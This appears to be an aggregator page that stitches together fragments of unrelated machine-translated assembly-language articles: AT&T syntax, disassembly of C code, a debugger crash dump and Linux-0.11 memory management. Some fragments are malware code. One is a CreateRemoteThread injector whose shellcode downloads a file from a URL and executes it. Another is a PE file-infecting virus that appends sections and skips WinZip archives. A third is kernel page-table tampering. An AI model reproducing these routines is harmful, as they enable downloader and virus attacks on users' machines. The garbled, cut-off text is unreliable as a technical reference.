the operation, such as Movl $foo,%eax equivalent to the Intel mov eax, Word ptr fooLong jump and call format is different, at/T is ljmp $section, $offset, and Intel is the JMP Section:offsetThe main difference is these, the other details are many, the following gives a specific example to illustrate#cpuid. S Sample Program. Section. DataOutput. ASCII "The processor Vendor ID is ' xxxxxxxxxxxx ' \ n". section. Text. globl _start_start:MOVL,%eaxCpuidMOVL $output,%ediMovl%ebx, (%
-------------------------------------------------------------------------------------------
. 78462fdf: AB stosd. 78462fe0: 5f pop EDI. 78462fe1: c20400 retn 00004.
Bytes -------------------------------------------------------------------------------------------
. 784635ec: 8bc6 mov eax, ESI. 784635ee: 5f pop EDI. 784635ef: 5E pop ESI. 784635f0: C3 retn
Bytes -----------------------------------------------
This article explains the use of assembly language to find the maximum value of a set of numbers, mainly related to the knowledge points have data segments, loops and so on.# Purpose: Find the largest number in the program # # Variable: The purpose of the Register # %edi-Save the data item index being checked # %EBX-the largest item currently found # %EAX-Current Data # # Use the following memory location: # Data_ Items-Contain
carried out in assembly, let's talk about some personal opinions. Next, we will conduct some small tests and explain them in assembly language. You can do it together.
(1) Char name [] and char * Name
[CPP] View plaincopy
1:
2:VoidProcess ()
3 :{
00401020 push EBP
00401021 mov EBP, ESP
00401023 sub ESP, 4ch
00401026 push EBX
00401027 push ESI
00401028 push EDI
00401029 Lea EDI
-level page tableMoV FS: [eax + ECx], EDX; modify the ing of our code in the physical memoryMoV dword ptr fs: [eax], 103 h; Modify physical page 0 (that is, bios/DOS zone ing to 80000000 H). Endif; Note: winnt does not use bios/DOS pages, that is, physical pages 0); ######################################## ######################################## ###################Call memscansapiaddr. If EDI; ### find the API function address in the memory, eax-> zw
talk about some personal opinions. Next, we will conduct some small tests and explain them in assembly language. You can do it together.
(1) char name [] and char * name
1:
2: void process ()
3 :{
00401020 push ebp
00401021 mov ebp, esp
00401023 sub esp, 4Ch
00401026 push ebx
00401027 push esi
00401028 push edi
00401029 lea edi, [ebp-4Ch]
0040102C mov ecx, 13 h
00401031 mov eax, 0 CCCCCCCCh
00401036 re
): Access violation - code c0000005 (!!! second chance !!!)*** ERROR: Symbol file could not be found. Defaulted to export symbols for F:\Program Files (x86)\Amazon\Kindle\Kindle.exe - eax=000000dd ebx=000004e4 ecx=00000000 edx=0022ed44 esi=0022ed68 edi=000000ddeip=0197383f esp=0022ed14 ebp=05920448 iopl=0 nv up ei pl nz na po nccs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00210202Kindle!std::_Init_locks::operator=+0x13
, hWnd, hModule, ShellSize, addr WrittenInvoke CreateRemoteThread, hProcess, 0, 0, addr Shellcode, hModule, 0, addr dwTidInvoke ExitProcess, 0End start
In fact, this section:
Shellcode procPush 00403008 HCall LoadLibraryPush 00403013 HCall LoadLibraryInvoke URLDownloadToFile, NULL, addr szURL, addr szSaveFile, NULL, NULLInvoke ShellExecute, 0, 0, addr szSaveFile, 0, SW_SHOWInvoke ExitThread, 0RetShellcode endp
You can convert it into a machine code, so that you do not need a subroutine. Directly
there are also functions prefixed with KE and Ki in the reactos kernel. The prefix ke indicates that it belongs to the "kernel" module. Note that the so-called "kernel" module in Windows is only part of the kernel, rather than the entire kernel. I will discuss this in "talking about wine" later. The prefix Ki refers to the functions related to interrupt response and processing in the kernel. Kisystemservice () is an assembly program which serves as system_call () in the Linux kernel. This Code
still no effect. I am very disappointed to read articles on the Internet to play. Inadvertently saw an article of Lao Luo, where he wrote a special note grateful to a person who helped him in the technology, pointed out that XXX should clear 0. It seems that he has encountered this problem, I add his code to my program, the miracle found that can be normal infection. I later looked up a lot of information and didn't find out what the structure was, only that it was the 11th member of the Image_
]
SHL ECx, 3
XOR edX, EDX
Lea EDI, [ECx + ESI + 78 H]
Movzx eax, word PTR [ESI + 6 H]
Imul eax, eax, 28 h
Add EDI, eax; locate to the end of the last section
; Start filling in the new section struct
This code is easy to locate at the end of the last section after the section table. You may use sizeofheader plus numberofsection * section size 28 h, but I still compare the method I am using. The reason is th
infection was like this, but one day, I found that the Notepad program that was infected with the virus could not be used. I always prompted "invalid Win32 program" that I wrote the virus again, I changed the code but it still didn't work. I am very disappointed to read articles online. I accidentally saw an article by Lao Luo. In one of the articles, he wrote a special comment. I am grateful to someone who helped him with the technology and pointed out that 0 should be cleared at XX. It seems
OnlySetInfectedMark
; Read all virus block tables
Mov eax, ebp; read function number
Call edi; read the block table to esi (@ 9)
The following is a complete modification to handle the Winzip self-extracting file error. when you open the self-extracting file,
The virus will not be infected. First, the virus obtains the ToRawData pointer of the 2nd block tables,
Read the data and determine whether the data contains the "WinZip (R )"
Xchg eax,
Here the "string" is not a single string, including all consecutive data (such as arrays); the string command is only used for memory operations.
Move string commands: movsb, movsw, and movsd; from ESI-> EDI; after execution, the ESI and EDI address move the corresponding unit comparison string commands: cmpsb, cmpsw, cmpsd; compare ESI and EDI. After exe
Linux-0.11 Memory Management module is the source of the more difficult to understand the part, now the author's personal understanding publishedFirst hair Linux-0.11 kernel memory management get_free_page () function analysisHave time to write other functions or files:)/* *author:davidlin *date:2014-11-11pm *email: [email protected] or [email protected] *world:the City of SZ , in China *ver:000.000.001 *history:editor time do 1) Linpeng 2014-11-11 Created this file! 2) */Here is the source code
The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion;
products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the
content of the page makes you feel confusing, please write us an email, we will handle the problem
within 5 days after receiving your email.
If you find any instances of plagiarism from the community, please send an email to:
info-contact@alibabacloud.com
and provide relevant evidence. A staff member will contact you within 5 working days.